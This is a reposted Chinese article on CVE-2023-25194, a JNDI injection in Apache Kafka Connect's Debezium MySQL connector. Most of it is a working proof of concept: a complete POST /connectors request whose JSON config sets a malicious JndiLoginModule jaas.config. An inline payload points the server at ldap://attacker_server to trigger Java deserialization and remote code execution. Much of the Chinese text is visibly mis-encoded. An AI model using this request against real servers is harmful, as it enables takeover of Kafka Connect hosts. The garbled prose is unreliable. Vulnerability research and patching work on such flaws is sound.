Apache Kafka 的最新更新解決的一個(gè)漏洞是一個(gè)不安全的 Java 反序列化問(wèn)題,可以利用該漏洞通過(guò)身份驗(yàn)證遠(yuǎn)程執(zhí)行代碼。
Apache Kafka 是一個(gè)開源分布式事件流平臺(tái),被數(shù)千家公司用于高性能數(shù)據(jù)管道、流分析、數(shù)據(jù)集成和任務(wù)關(guān)鍵型應(yīng)用程序。超過(guò) 80% 的財(cái)富 100 強(qiáng)公司信任并使用 Kafka。
通過(guò) Aiven API 或 Kafka Connect REST API 配置連接器時(shí),攻擊者可以為連接器設(shè)置database.history.producer.sasl.jaas.config
連接器屬性io.debezium.connector.mysql.MySqlConnector
。其他 debezium 連接器也可能如此。通過(guò)將連接器值設(shè)置為"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
,服務(wù)器將連接到攻擊者的 LDAP 服務(wù)器并反序列化 LDAP 響應(yīng),攻擊者可以使用它在 kafka 連接服務(wù)器上執(zhí)行 java 反序列化小工具鏈。
?鏈接HackerOne
?POCGitHub - ohnonoyesyes/CVE-2023-25194
POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109
{"name": "test",
"config":
{
"connector.class":"io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "xxxxx",
"database.port": "3306",
"database.user": "root",
"database.password": "xxxxxx",
"database.dbname": "xxxx",
"database.sslmode": "SSL_MODE",
"database.server.id": "1234",
"database.server.name": "localhost",
"table.include.list": "MYSQL_TABLES",
"tasks.max":"1",
"topic.prefix": "aaa22",
"debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
"schema.history.internal.kafka.topic": "aaa22",
"schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
"database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-519353.html文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-519353.html
?
到了這里,關(guān)于CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!